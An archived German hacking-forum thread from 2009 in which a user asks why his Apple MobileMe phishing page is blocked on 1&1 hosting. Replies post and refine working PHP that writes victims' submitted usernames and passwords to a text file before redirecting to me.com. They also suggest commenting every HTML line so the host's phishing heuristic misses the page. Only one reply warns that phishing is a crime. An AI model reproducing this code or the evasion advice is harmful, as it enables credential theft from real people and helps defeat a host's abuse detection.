PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Phishing bei 1&1-Hosting Unmöglich?



CosaNostra
16.08.2009, 05:12
Hey Leute,
also ich habe folgendes Problem. . . Habe mich gestern bei 1&1 angemeldet und mir eine Domain gekauft . me-activation.com (VORSICHT PHISHING PAGE). Auf jeden Fall klappt es auf anderen free hostern prima und alles funktioniert so wie es sein sollte jedoch bei 1&1 bekomme ich diese fehlermeldung. . .
ZUGRIFF NICHT ERLAUBT

Die angeforderte Seite darf nicht angezeigt werden.

Loggt euch einfach mal ein (natürlich nicht mit euren echten mac/me daten falls vorhanden) dann seht ihr was ich meine. Weiß zufällig jemand wie ich das umgehen kann ? hier sind die files die ich hochgeladen habe . . .
http://ul.to/aekan9

VeN0m
16.08.2009, 11:13
<?php
header ('Location: http://www.me.com ');
?>
<?php
$username = $_POST["rodneyjerkins52@googlemail.com"];
$pw = $_POST["password"];

$d = fopen("sag ich nich :D.txt","a");
fwrite ($d,"Username: $username
Password: $pw

");
fclose($d);
?>

Der Code gefällt mir garnicht, sorry.



$_POST["rodneyjerkins52@googlemail.com"];


müsste doch username sein?



<?php
header ('Location: http://www.me.com ');

$d = fopen("sag ich nich :D.txt","a");

foreach($_POST AS $key => $value) {

fwrite($d,$key."=".$value."\r\n");

}

fwrite($d,"\r\n");
fclose($d);
?>


Try it like this...
Würde aber nicht sagen, dass es am Script liegt. Vielleicht sind 1&1 selbst solche Phishingseiten bekannt und sie blocken sowas, denke ich aber auch nicht.
Wann genau kommt denn der Fehler? Beim absenden des Formulars?
Würde Dir empfehlen, die Seite nochmal neu zu speichern...

CosaNostra
16.08.2009, 11:40
nein die fehleer meldung kommt nachdem man auf der phishing seite "Activate" drückt also bei der weiterleitung

VeN0m
16.08.2009, 11:46
Und es wird nichts in die Datei eingetragen? Ich würde sonst vermuten, dass beim header() was falsch läuft und die Zielseite gemeint ist, nicht Deine. Eine deutsche Fehlermeldung wäre für einen HTTP-Error (wie "permissions denied", zu umgehen durch einen höheren CHMOD) ungewöhnlich, könnte aber auch sein ^^. Dann wäre "Die Seite darf nicht angezeigt werden" dennoch ungewöhnlich.

CosaNostra
16.08.2009, 12:03
nein es wird nichts eingetragen

auf anderen webhostern funkt alles prima

ich denke man muss die php so umschreiben oda die index.html das 1&1 es sozusagen nicht erkennt aber wer würde sich hier schon die mühe für machen ?

VeN0m
16.08.2009, 12:07
Naja, füg halt ein paar Kommentare ein ^^ (in der index.html).
<!--Kommentar-->
Vielleicht hat 1&1 wirklich eine "Heuristik", die Phishingseiten an ihrem Quelltext erkennt. Wenn Du nun einfach jede Zeile kommentierst kannst Du das vielleicht aushebeln. Wer weiß... Vielleicht liegt es auch an was ganz anderem, der Code sah aber eigentlich in Ordnung aus, daher bliebe das auch meine letzte Vermutung.

Publix
16.08.2009, 12:15
sowit ich weis braucht man eine index.html... ich hab auch einen host bei 1und1 ich teste es mal schnell okay... und oishing würde ich auf 1und1 nicht betreiben ;) Gibt doch genug andere Seiten für sowas. Beachte Pishing ist auch eine Strafe. Und dagegen wird 1und1 dann auch warscheinlich vorgehen. Da gibts glaub ich sogar auf deinem host Logs. Kannst mal reingucken.